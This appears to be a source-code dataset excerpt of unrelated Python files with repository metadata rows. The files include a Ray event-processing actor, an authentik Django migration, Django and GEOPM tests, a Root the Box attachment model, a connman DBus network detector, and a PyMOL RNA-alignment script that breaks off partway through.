if PROMPT_WITH_NOTIFICATION_IDS:
try:
rayid = self._notification_rayids.pop(
(upstream_name, notification_id)
)
except KeyError:
break
else:
notification = ray.get(rayid)
# self._print_timecheck(
# "Got notification from ray id",
# notification_id,
# rayid,
# notification,
# )
notifications.append(notification)
elif PROMPT_WITH_NOTIFICATION_OBJS:
try:
notification = self._prompted_notifications.pop(
(upstream_name, notification_id)
)
# self._print_timecheck(
# "Got notification from prompted notifications dict",
# notification_id,
# notification,
# )
except KeyError:
break
else:
notifications.append(notification)
first_id += 1
# Pull the ones we don't have.
if last_id is None or first_id <= last_id:
# self._print_timecheck("Pulling notifications", first_id, last_id,
# 'from', upstream_name)
rayid = upstream_process.get_notifications.remote(first_id, last_id)
_notifications = ray.get(rayid)
# self._print_timecheck("Pulled notifications", _notifications)
notifications += _notifications
# self.print_timecheck(
# "Obtained notifications:", len(notifications), 'from',
# upstream_name
# )
if len(notifications):
if len(notifications) == PAGE_SIZE:
# self._print_timecheck("Range limit reached, reprompting...")
self._has_been_prompted.set()
position = notifications[-1]["id"]
with self.positions_lock:
current_position = self.positions[upstream_name]
if current_position is None or position > current_position:
self.positions[upstream_name] = position
queue_item = []
for notification in notifications:
# Check causal dependencies.
self.process_application.check_causal_dependencies(
upstream_name, notification.get("causal_dependencies")
)
# Get domain event from notification.
event = self.process_application.event_from_notification(
notification
)
# self.print_timecheck("obtained event", event)
# Put domain event on the queue, for event processing.
queue_item.append((event, notification["id"], upstream_name))
self.upstream_event_queue.put(queue_item)
sleep(MICROSLEEP)
def get_notifications(self, first_notification_id, last_notification_id):
"""
Returns a list of notifications, with IDs from first_notification_id
to last_notification_id, inclusive. IDs are 1-based sequence.
This is called by the "process prompts" thread of a downstream process.
"""
return self.do_db_job(
self._get_notifications, (first_notification_id, last_notification_id), {}
)
def _get_notifications(self, first_notification_id, last_notification_id):
record_manager = self.process_application.event_store.record_manager
assert isinstance(record_manager, RecordManagerWithNotifications)
start = first_notification_id - 1
stop = last_notification_id
return list(record_manager.get_notifications(start, stop))
def _process_events(self):
while not self.has_been_stopped.is_set():
try:
self.__process_events()
except Exception as e:
print(traceback.format_exc())
print("Continuing after error in 'process events' thread:", e)
sleep(1)
def __process_events(self):
try:
queue_item = self.upstream_event_queue.get() # timeout=5)
self.upstream_event_queue.task_done()
except Empty:
if self.has_been_stopped.is_set():
return
else:
if queue_item is None or self.has_been_stopped.is_set():
return
for (domain_event, notification_id, upstream_name) in queue_item:
# print("Processing upstream event:", (domain_event,
# notification_id, upstream_name))
new_events, new_records = (), ()
while not self.has_been_stopped.is_set():
try:
new_events, new_records = self.do_db_job(
method=self.process_application.process_upstream_event,
args=(domain_event, notification_id, upstream_name),
kwargs={},
)
break
except Exception as e:
print(traceback.format_exc())
self._print_timecheck(
"Retrying to reprocess event after error:", e
)
sleep(1)
# Todo: Forever? What if this is the wrong event?
if self.has_been_stopped.is_set():
return
# if new_events:
# self._print_timecheck("new events", len(new_events), new_events)
notifications = ()
notification_ids = ()
notifiable_events = [e for e in new_events if e.__notifiable__]
if len(notifiable_events):
if PROMPT_WITH_NOTIFICATION_IDS or PROMPT_WITH_NOTIFICATION_OBJS:
manager = self.process_application.event_store.record_manager
assert isinstance(manager, RecordManagerWithNotifications)
notification_id_name = manager.notification_id_name
notifications = []
for record in new_records:
if isinstance(
getattr(record, notification_id_name, None), int
):
notifications.append(
manager.create_notification_from_record(record)
)
if len(notifications):
head_notification_id = notifications[-1]["id"]
if PROMPT_WITH_NOTIFICATION_IDS:
notification_ids = self._put_notifications_in_ray_object_store(
notifications
)
# Clear the notifications, avoid sending with IDs.
notifications = ()
else:
head_notification_id = self._get_max_notification_id()
else:
head_notification_id = self._get_max_notification_id()
prompt = RayPrompt(
self.process_application.name,
self.process_application.pipeline_id,
head_notification_id,
notification_ids,
notifications,
)
# self.print_timecheck(
# "putting prompt on downstream " "prompt queue",
# self.downstream_prompt_queue.qsize(),
# )
self.downstream_prompt_queue.put(prompt)
sleep(MICROSLEEP)
# self.print_timecheck(
# "put prompt on downstream prompt " "queue"
# )
# sleep(0.1)
def _put_notifications_in_ray_object_store(self, notifications):
notification_ids = [(n["id"], ray.put(n)) for n in notifications]
return notification_ids
def _enqueue_prompt_to_pull(self, prompt):
# print("Enqueing locally published prompt:", prompt)
self.downstream_prompt_queue.put(prompt)
sleep(MICROSLEEP)
def _push_prompts(self) -> None:
while not self.has_been_stopped.is_set():
try:
self.__push_prompts()
except Exception as e:
print(traceback.format_exc())
print("Continuing after error in 'push prompts' thread:", e)
sleep(1)
def __push_prompts(self):
try:
item = self.downstream_prompt_queue.get() # timeout=1)
self.downstream_prompt_queue.task_done()
# Todo: Instead, drain the queue and consolidate prompts.
except Empty:
self._print_timecheck(
"timed out getting item from downstream prompt " "queue"
)
if self.has_been_stopped.is_set():
return
else:
# self.print_timecheck("task done on downstream prompt queue")
if item is None or self.has_been_stopped.is_set():
return
elif isinstance(item, PromptToPull):
if item.head_notification_id:
head_notification_id = item.head_notification_id
else:
head_notification_id = self._get_max_notification_id()
prompt = RayPrompt(
self.process_application.name,
self.process_application.pipeline_id,
head_notification_id,
)
else:
prompt = item
# self._print_timecheck('pushing prompt with', prompt.notification_ids)
prompt_response_ids = []
# self.print_timecheck("pushing prompts", prompt)
for downstream_name, ray_process in self.downstream_processes.items():
prompt_response_ids.append(ray_process.prompt.remote(prompt))
if self.has_been_stopped.is_set():
return
# self._print_timecheck("pushed prompt to", downstream_name)
ray.get(prompt_response_ids)
# self._print_timecheck("pushed prompts")
def _get_max_notification_id(self):
"""
Returns the highest notification ID of this process application.
:return:
"""
record_manager = self.process_application.event_store.record_manager
assert isinstance(record_manager, RecordManagerWithNotifications)
max_notification_id = self.do_db_job(
record_manager.get_max_notification_id, (), {}
)
# self.print_timecheck("MAX NOTIFICATION ID in DB:", max_notification_id)
return max_notification_id
def stop(self):
"""
Stops the process.
"""
# print("%s actor stopping %s" % (os.getpid(), datetime.datetime.now()))
self.has_been_stopped.set()
# print("%s actor joining db_jobs_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.db_jobs_queue.put(None)
self.upstream_event_queue.put(None)
self.downstream_prompt_queue.put(None)
self._has_been_prompted.set()
self.positions_initialised.set()
self.db_jobs_thread.join(timeout=1)
assert not self.db_jobs_thread.is_alive(), (
"DB jobs thread still alive"
)
# print("%s actor joining process_events_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.process_events_thread.join(timeout=1)
assert not self.process_events_thread.is_alive(), (
"Process events thread still alive"
)
# print("%s actor joining process_prompts_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.process_prompts_thread.join(timeout=1)
assert not self.process_prompts_thread.is_alive(), (
"Process prompts thread still alive"
)
# print("%s actor joining push_prompts_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.push_prompts_thread.join(timeout=1)
assert not self.push_prompts_thread.is_alive(), (
"Push prompts thread still alive"
)
self.process_application.close()
unsubscribe(handler=self._enqueue_prompt_to_pull, predicate=is_prompt_to_pull)
# print("%s actor stopped %s" % (os.getpid(), datetime.datetime.now()))
ray.actor.exit_actor()
def _print_timecheck(self, activity, *args):
# pass
process_name = self.application_process_class.__name__.lower()
print(
"Timecheck",
datetime.datetime.now(),
self.pipeline_id,
process_name,
activity,
*args
)
class ProxyApplication:
def __init__(self, ray_process: RayProcess):
self.ray_process: RayProcess = ray_process
def __getattr__(self, item):
return ProxyMethod(self.ray_process, item)
class ProxyMethod:
def __init__(self, ray_process: RayProcess, attribute_name: str):
self.ray_process: RayProcess = ray_process
self.attribute_name = attribute_name
def __call__(self, *args, **kwargs):
ray_id = self.ray_process.call.remote(self.attribute_name, *args, **kwargs)
return_value = ray.get(ray_id)
if isinstance(return_value, ExceptionWrapper):
raise return_value.e
else:
return return_value
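
# A minimal sketch of the forwarding pattern used by ProxyApplication/ProxyMethod,
# stripped of Ray: attribute access yields a callable that forwards to the target.
# The names below are illustrative only.
class _ForwardingProxy:
    def __init__(self, target):
        self._target = target

    def __getattr__(self, name):
        def forward(*args, **kwargs):
            return getattr(self._target, name)(*args, **kwargs)
        return forward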
| 41.030504
| 95
| 0.580761
| 29,594
| 0.956589
| 0
| 0
| 24,899
| 0.804829
| 0
| 0
| 5,374
| 0.173708
|
fbff951b3453445a7ed046dfadb09ce047c59a21
| 1,766
|
py
|
Python
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 15
|
2020-01-05T09:09:57.000Z
|
2020-11-28T05:27:39.000Z
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 302
|
2020-01-21T08:03:59.000Z
|
2020-12-04T05:04:57.000Z
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 3
|
2020-03-04T08:21:59.000Z
|
2020-08-01T20:37:18.000Z
|
# Generated by Django 3.2.6 on 2021-08-23 14:34
import django.contrib.postgres.fields
from django.apps.registry import Apps
from django.db import migrations, models
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from authentik.stages.password import BACKEND_APP_PASSWORD, BACKEND_INBUILT
def update_default_backends(apps: Apps, schema_editor: BaseDatabaseSchemaEditor):
PasswordStage = apps.get_model("authentik_stages_password", "passwordstage")
db_alias = schema_editor.connection.alias
stages = PasswordStage.objects.using(db_alias).filter(name="default-authentication-password")
if not stages.exists():
return
stage = stages.first()
stage.backends.append(BACKEND_APP_PASSWORD)
stage.save()
class Migration(migrations.Migration):
dependencies = [
("authentik_stages_password", "0006_passwordchange_rename"),
]
operations = [
migrations.AlterField(
model_name="passwordstage",
name="backends",
field=django.contrib.postgres.fields.ArrayField(
base_field=models.TextField(
choices=[
("authentik.core.auth.InbuiltBackend", "User database + standard password"),
("authentik.core.auth.TokenBackend", "User database + app passwords"),
(
"authentik.sources.ldap.auth.LDAPBackend",
"User database + LDAP password",
),
]
),
help_text="Selection of backends to test the password against.",
size=None,
),
),
migrations.RunPython(update_default_backends),
]
| 36.040816
| 100
| 0.625708
| 1,008
| 0.570781
| 0
| 0
| 0
| 0
| 0
| 0
| 463
| 0.262174
|
220006b165652d33b27e971f916a5a800cf16e0a
| 1,211
|
py
|
Python
|
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth.models import User
from article.models import Article, Category
class ArticleModelTestCase(TestCase):
def setUp(self):
self.category = Category.objects.create(name=u'Sports')
self.user = User.objects.create(username=u'test', password=u'secret')
def test_save(self):
new_article = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
self.assertEqual(new_article.title, u'test')
self.assertEqual(new_article.content, u'test')
self.assertEqual(new_article.author, self.user)
self.assertEqual(new_article.category, self.category)
def test_unique_slug(self):
new_article1 = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
new_article2 = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
self.assertTrue(new_article1.slug != new_article2.slug)
| 29.536585
| 77
| 0.6218
| 1,085
| 0.895954
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.066887
|
2200800f734e84798d40a112ef14379650a7d44d
| 145
|
py
|
Python
|
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
import os , sys
sys.path.append(os.getcwd())
import pytest
from typehints_checker import *
@pytest.mark.asyncio
async def test_import():
...
| 18.125
| 31
| 0.737931
| 0
| 0
| 0
| 0
| 53
| 0.365517
| 32
| 0.22069
| 0
| 0
|
2200a38582a5987a8032f11e6758387289477471
| 2,240
|
py
|
Python
|
models/FlagAttachment.py
|
jeffg2k/RootTheBox
|
1bb971f98da96f66c868f5786c2405321b0be976
|
[
"Apache-2.0"
] | 1
|
2020-02-28T16:23:12.000Z
|
2020-02-28T16:23:12.000Z
|
models/FlagAttachment.py
|
Warlockk/RootTheBox
|
e24f3e0350aec1b65be81cdc71ff09a5e1b8e587
|
[
"Apache-2.0"
] | null | null | null |
models/FlagAttachment.py
|
Warlockk/RootTheBox
|
e24f3e0350aec1b65be81cdc71ff09a5e1b8e587
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Nov 24, 2014
@author: moloch
Copyright 2014 Root the Box
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from uuid import uuid4
from sqlalchemy import Column, ForeignKey
from sqlalchemy.types import Unicode, String, Integer
from models.BaseModels import DatabaseObject
from libs.StringCoding import encode, decode
from builtins import str
from tornado.options import options
class FlagAttachment(DatabaseObject):
"""
These are files that the administrator wants to
distribute alongside a flag.
"""
uuid = Column(String(36), unique=True, nullable=False, default=lambda: str(uuid4()))
flag_id = Column(Integer, ForeignKey("flag.id"), nullable=False)
_file_name = Column(Unicode(64), nullable=False)
@property
def file_name(self):
return self._file_name
@file_name.setter
def file_name(self, value):
fname = value.replace("\n", "").replace("\r", "")
self._file_name = str(os.path.basename(fname))[:64]
@property
def data(self):
with open(options.flag_attachment_dir + "/" + self.uuid, "rb") as fp:
return decode(fp.read(), "base64")
@data.setter
def data(self, value):
if self.uuid is None:
self.uuid = str(uuid4())
self.byte_size = len(value)
with open(options.flag_attachment_dir + "/" + self.uuid, "wb") as fp:
fp.write(str(encode(value, "base64")).encode())
def delete_data(self):
""" Remove the file from the file system, if it exists """
fpath = options.flag_attachment_dir + "/" + self.uuid
if os.path.exists(fpath) and os.path.isfile(fpath):
os.unlink(fpath)
| 31.111111
| 88
| 0.672768
| 1,288
| 0.575
| 0
| 0
| 666
| 0.297321
| 0
| 0
| 873
| 0.389732
|
22016594c64927e9cac7fbe2989ffcfcf16a646f
| 1,278
|
py
|
Python
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | 4
|
2015-01-04T19:26:01.000Z
|
2017-06-06T21:04:01.000Z
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | 1
|
2015-04-04T13:19:15.000Z
|
2015-04-04T13:19:15.000Z
|
connman_dispatcher/detect.py
|
a-sk/connman-dispatcher
|
2561ae87ffd26d0f98bb1ab2b430e181be3d01c1
|
[
"0BSD"
] | null | null | null |
import glib
import dbus
from dbus.mainloop.glib import DBusGMainLoop
from pyee import EventEmitter
import logbook
logger = logbook.Logger('connman-dispatcher')
__all__ = ['detector']
def property_changed(_, message):
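    # DBus message filter: invoked for every net.connman.Manager signal;
    # only PropertyChanged state transitions are acted upon.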
if message.get_member() == "PropertyChanged":
_, state = message.get_args_list()
if state == 'online' and detector.state == 'offline':
            logger.info('network state change: online')
detector.emit('up')
detector.state = 'online'
elif state == 'idle':
            logger.info('network state change: offline')
detector.emit('down')
detector.state = 'offline'
detector = EventEmitter()
DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
bus.add_match_string_non_blocking("interface='net.connman.Manager'")
bus.add_message_filter(property_changed)
manager = dbus.Interface(bus.get_object('net.connman', "/"), 'net.connman.Manager')
def is_online():
properties = manager.GetProperties()
if properties['State'] == 'online':
return True
return False
def run():
detector.state = 'offline'
    if is_online():
detector.emit('up')
detector.state = 'online'
mainloop = glib.MainLoop()
mainloop.run()
detector.run = run
| 25.058824
| 83
| 0.661972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 264
| 0.206573
|
2202355dec4485d79be0734da044b8e85dc7a3dc
| 4,294
|
py
|
Python
|
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
integration/test/test_profile_overflow.py
|
avilcheslopez/geopm
|
35ad0af3f17f42baa009c97ed45eca24333daf33
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2015 - 2022, Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Runs an application with a large number of short regions and checks
that the controller successfully runs.
"""
import sys
import unittest
import os
import subprocess
import glob
import geopmpy.io
import geopmpy.agent
import geopmdpy.error
import geopmdpy.topo
from integration.test import geopm_test_launcher
from integration.test import check_trace
class AppConf(object):
"""Class that is used by the test launcher in place of a
geopmpy.io.BenchConf when running the profile_overflow benchmark.
"""
def write(self):
"""Called by the test launcher prior to executing the test application
to write any files required by the application.
"""
pass
def get_exec_path(self):
"""Path to benchmark filled in by template automatically.
"""
script_dir = os.path.dirname(os.path.realpath(__file__))
return os.path.join(script_dir, '.libs', 'test_profile_overflow')
def get_exec_args(self):
"""Returns a list of strings representing the command line arguments
to pass to the test-application for the next run. This is
especially useful for tests that execute the test-application
multiple times.
"""
return []
class TestIntegration_profile_overflow(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Create launcher, execute benchmark and set up class variables.
"""
sys.stdout.write('(' + os.path.basename(__file__).split('.')[0] +
'.' + cls.__name__ + ') ...')
test_name = 'test_profile_overflow'
cls._report_path = '{}.report'.format(test_name)
cls._trace_path = '{}.trace'.format(test_name)
cls._log_path = '{}.log'.format(test_name)
cls._agent_conf_path = test_name + '-agent-config.json'
# Set the job size parameters such that we have a 3 level tree
os.environ["GEOPM_MAX_FAN_OUT"] = "2"
num_node = 4
num_rank = geopmdpy.topo.num_domain(geopmdpy.topo.DOMAIN_CORE) - 2
time_limit = 600
# Configure the test application
app_conf = AppConf()
# Configure the agent
agent_conf = geopmpy.agent.AgentConf(cls._agent_conf_path)
# Create the test launcher with the above configuration
launcher = geopm_test_launcher.TestLauncher(app_conf,
agent_conf,
cls._report_path,
cls._trace_path,
time_limit=time_limit)
launcher.set_num_node(num_node)
launcher.set_num_rank(num_rank)
# Run the test application
try:
launcher.run(test_name)
except subprocess.CalledProcessError:
sys.stderr.write('{} failed; check log for details.\n'.format(test_name))
raise
@classmethod
def tearDownClass(cls):
os.environ.pop("GEOPM_MAX_FAN_OUT")
def test_load_report(self):
'''
Test that the report can be loaded.
'''
report = geopmpy.io.RawReport(self._report_path)
hosts = report.host_names()
for hh in hosts:
runtime = report.raw_totals(hh)['runtime (s)']
self.assertNotEqual(0, runtime)
def test_short_region_count(self):
'''
Test that the count for MPI_Barrier is as expected.
'''
report = geopmpy.io.RawReport(self._report_path)
hosts = report.host_names()
for hh in hosts:
region_data = report.raw_region(hh, 'MPI_Barrier')
count = region_data['count']
self.assertEqual(count, 10000000)
def test_sample_rate(self):
'''
Test that the sample rate is regular.
'''
traces = glob.glob(self._trace_path + "*")
if len(traces) == 0:
            raise RuntimeError("No traces found with prefix: {}".format(self._trace_path))
for tt in traces:
check_trace.check_sample_rate(tt, 0.005)
if __name__ == '__main__':
unittest.main()
| 32.778626
| 97
| 0.614578
| 3,766
| 0.877038
| 0
| 0
| 1,732
| 0.403354
| 0
| 0
| 1,555
| 0.362133
|
2203367508cf03902b996dcb408a29b0ce2106d4
| 13,627
|
py
|
Python
|
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Objects/optAlignRNA.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: OptiAlign.py by Jason Vertree modified for aligning multiple RNA structures.
# Source: Generated while helping Miranda Adams at U of Saint Louis.
"""
cmd.do('python')
cmd.do(' ##############################################################################')
cmd.do('#')
cmd.do('# @SUMMARY: -- QKabsch.py. A python implementation of the optimal superposition')
cmd.do('# of two sets of vectors as proposed by Kabsch 1976 & 1978.')
cmd.do('#')
cmd.do('# @AUTHOR: Jason Vertrees')
cmd.do('# @COPYRIGHT: Jason Vertrees (C), 2005-2007')
cmd.do('# @LICENSE: Released under GPL:')
cmd.do('# This program is free software; you can redistribute it and/or modify')
cmd.do('# it under the terms of the GNU General Public License as published by')
cmd.do('# the Free Software Foundation; either version 2 of the License, or')
cmd.do('# (at your option) any later version.')
cmd.do('# This program is distributed in the hope that it will be useful, but WITHOUT')
cmd.do('# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS')
cmd.do('# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.')
cmd.do('#')
cmd.do('# You should have received a copy of the GNU General Public License along with')
cmd.do('# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin')
cmd.do('# Street, Fifth Floor, Boston, MA 02110-1301, USA ')
cmd.do('#')
cmd.do('# DATE : 2007-01-01')
cmd.do('# REV : 2')
cmd.do('# REQUIREMENTS: numpy')
cmd.do('#')
cmd.do('#')
cmd.do('# Modified optAlign.py to use C1' carbon atoms of RNA for alignment.')
cmd.do('# Jan. 29, 2020 ')
cmd.do('# Blaine Mooers, PhD')
cmd.do('# Univ. of Oklahoma Health Sciences Center')
cmd.do('#')
cmd.do('#############################################################################')
cmd.do('from array import *')
cmd.do(' ')
cmd.do('# system stuff')
cmd.do('import os')
cmd.do('import copy')
cmd.do(' ')
cmd.do('# pretty printing')
cmd.do('import pprint')
cmd.do(' ')
cmd.do('# for importing as a plugin into PyMol')
cmd.do('from pymol import cmd')
cmd.do('from pymol import stored')
cmd.do('from pymol import selector')
cmd.do(' ')
cmd.do('# using numpy for linear algebra')
cmd.do('import numpy')
cmd.do(' ')
cmd.do('def optAlignRNA( sel1, sel2 ):')
cmd.do(' """')
cmd.do(' optAlignRNA performs the Kabsch alignment algorithm upon the C1' carbons of two selections.')
cmd.do(' Example: optAlignRNA 1JU7 and i. 1-16 and n. C1', 1CLL and i. 4-146 and n. C1'')
cmd.do(' ')
cmd.do(' Two RMSDs are returned. One comes from the Kabsch algorithm and the other from')
cmd.do(' PyMOL based upon your selections.')
cmd.do(' ')
cmd.do(' This function can be run in a for loop to fit multiple structures with a common prefix name:')
cmd.do(' ')
cmd.do(' for x in cmd.get_names(): optAlignRNA(x, "1JU7_0001")')
cmd.do(' ')
cmd.do(' or get the rmsds for all combinations, do the following:')
cmd.do(' ')
cmd.do(' [[optAlignRNA(x, y) for x in cmd.get_names()] for y in cmd.get_names()]')
cmd.do('')
cmd.do(' """')
cmd.do(' cmd.reset()')
cmd.do(' ')
cmd.do(' # make the lists for holding coordinates')
cmd.do(' # partial lists')
cmd.do(' stored.sel1 = []')
cmd.do(' stored.sel2 = []')
cmd.do(' # full lists')
cmd.do(' stored.mol1 = []')
cmd.do(' stored.mol2 = []')
cmd.do(' ')
cmd.do(' # -- CUT HERE')
cmd.do(' sel1 += " and N. C1'"')
cmd.do(' sel2 += " and N. C1'"')
cmd.do(' # -- CUT HERE')
cmd.do(' ')
cmd.do(' # Get the selected coordinates. We')
cmd.do(' # align these coords.')
cmd.do(' cmd.iterate_state(1, selector.process(sel1), "stored.sel1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, selector.process(sel2), "stored.sel2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # get molecule name')
cmd.do(' mol1 = cmd.identify(sel1,1)[0][0]')
cmd.do(' mol2 = cmd.identify(sel2,1)[0][0]')
cmd.do(' ')
cmd.do(' # Get all molecule coords. We do this because')
cmd.do(' # we have to rotate the whole molcule, not just')
cmd.do(' # the aligned selection')
cmd.do(' cmd.iterate_state(1, mol1, "stored.mol1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, mol2, "stored.mol2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # check for consistency')
cmd.do(' assert len(stored.sel1) == len(stored.sel2)')
cmd.do(' L = len(stored.sel1)')
cmd.do(' assert L > 0')
cmd.do(' ')
cmd.do(' # must alway center the two proteins to avoid')
cmd.do(' # affine transformations. Center the two proteins')
cmd.do(' # to their selections.')
cmd.do(' COM1 = numpy.sum(stored.sel1,axis=0) / float(L)')
cmd.do(' COM2 = numpy.sum(stored.sel2,axis=0) / float(L)')
cmd.do(' stored.sel1 -= COM1')
cmd.do(' stored.sel2 -= COM2')
cmd.do(' ')
cmd.do(' # Initial residual, see Kabsch.')
cmd.do(' E0 = numpy.sum( numpy.sum(stored.sel1 * stored.sel1,axis=0),axis=0) + numpy.sum( numpy.sum(stored.sel2 * stored.sel2,axis=0),axis=0)')
cmd.do(' ')
cmd.do(' #')
cmd.do(' # This beautiful step provides the answer. V and Wt are the orthonormal')
cmd.do(' # bases that when multiplied by each other give us the rotation matrix, U.')
cmd.do(' # S, (Sigma, from SVD) provides us with the error! Isn't SVD great!')
cmd.do(' V, S, Wt = numpy.linalg.svd( numpy.dot( numpy.transpose(stored.sel2), stored.sel1))')
cmd.do(' ')
cmd.do(' # we already have our solution, in the results from SVD.')
cmd.do(' # we just need to check for reflections and then produce')
cmd.do(' # the rotation. V and Wt are orthonormal, so their det's')
cmd.do(' # are +/-1.')
cmd.do(' reflect = float(str(float(numpy.linalg.det(V) * numpy.linalg.det(Wt))))')
cmd.do(' ')
cmd.do(' if reflect == -1.0:')
cmd.do(' S[-1] = -S[-1]')
cmd.do(' V[:,-1] = -V[:,-1]')
cmd.do(' ')
cmd.do(' RMSD = E0 - (2.0 * sum(S))')
cmd.do(' RMSD = numpy.sqrt(abs(RMSD / L))')
cmd.do(' ')
cmd.do(' #U is simply V*Wt')
cmd.do(' U = numpy.dot(V, Wt)')
cmd.do(' ')
cmd.do(' # rotate and translate the molecule')
cmd.do(' stored.sel2 = numpy.dot((stored.mol2 - COM2), U)')
cmd.do(' stored.sel2 = stored.sel2.tolist()')
cmd.do(' # center the molecule')
cmd.do(' stored.sel1 = stored.mol1 - COM1')
cmd.do(' stored.sel1 = stored.sel1.tolist()')
cmd.do(' ')
cmd.do(' # let PyMol know about the changes to the coordinates')
cmd.do(' cmd.alter_state(1,mol1,"(x,y,z)=stored.sel1.pop(0)")')
cmd.do(' cmd.alter_state(1,mol2,"(x,y,z)=stored.sel2.pop(0)")')
cmd.do(' ')
cmd.do(' #print("Moved: %s Reference: %s RMSD = %f" % mol1, mol2, RMSD)')
cmd.do(' print("% s, % s,% 5.3f" % (mol1, mol2, RMSD))')
cmd.do(' ')
cmd.do(' # make the alignment OBVIOUS')
cmd.do(' cmd.hide("everything")')
cmd.do(' cmd.show("ribbon", sel1 + " or " + sel2)')
cmd.do(' cmd.color("gray70", mol1 )')
cmd.do(' cmd.color("magenta", mol2 )')
cmd.do(' cmd.color("red", "visible")')
cmd.do(' cmd.show("ribbon", "not visible")')
cmd.do(' cmd.center("visible")')
cmd.do(' cmd.orient()')
cmd.do(' cmd.zoom("visible")')
cmd.do(' ')
cmd.do('cmd.extend("optAlignRNA", optAlignRNA)')
cmd.do('python end')
"""
cmd.do('python')
cmd.do(' ##############################################################################')
cmd.do('#')
cmd.do('# @SUMMARY: -- QKabsch.py. A python implementation of the optimal superposition')
cmd.do('# of two sets of vectors as proposed by Kabsch 1976 & 1978.')
cmd.do('#')
cmd.do('# @AUTHOR: Jason Vertrees')
cmd.do('# @COPYRIGHT: Jason Vertrees (C), 2005-2007')
cmd.do('# @LICENSE: Released under GPL:')
cmd.do('# This program is free software; you can redistribute it and/or modify')
cmd.do('# it under the terms of the GNU General Public License as published by')
cmd.do('# the Free Software Foundation; either version 2 of the License, or')
cmd.do('# (at your option) any later version.')
cmd.do('# This program is distributed in the hope that it will be useful, but WITHOUT')
cmd.do('# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS')
cmd.do('# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.')
cmd.do('#')
cmd.do('# You should have received a copy of the GNU General Public License along with')
cmd.do('# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin')
cmd.do('# Street, Fifth Floor, Boston, MA 02110-1301, USA ')
cmd.do('#')
cmd.do('# DATE : 2007-01-01')
cmd.do('# REV : 2')
cmd.do('# REQUIREMENTS: numpy')
cmd.do('#')
cmd.do('#')
cmd.do("# Modified optAlign.py to use C1' carbon atoms of RNA for alignment.")
cmd.do('# Jan. 29, 2020 ')
cmd.do('# Blaine Mooers, PhD')
cmd.do('# Univ. of Oklahoma Health Sciences Center')
cmd.do('#')
cmd.do('#############################################################################')
cmd.do('from array import *')
cmd.do(' ')
cmd.do('# system stuff')
cmd.do('import os')
cmd.do('import copy')
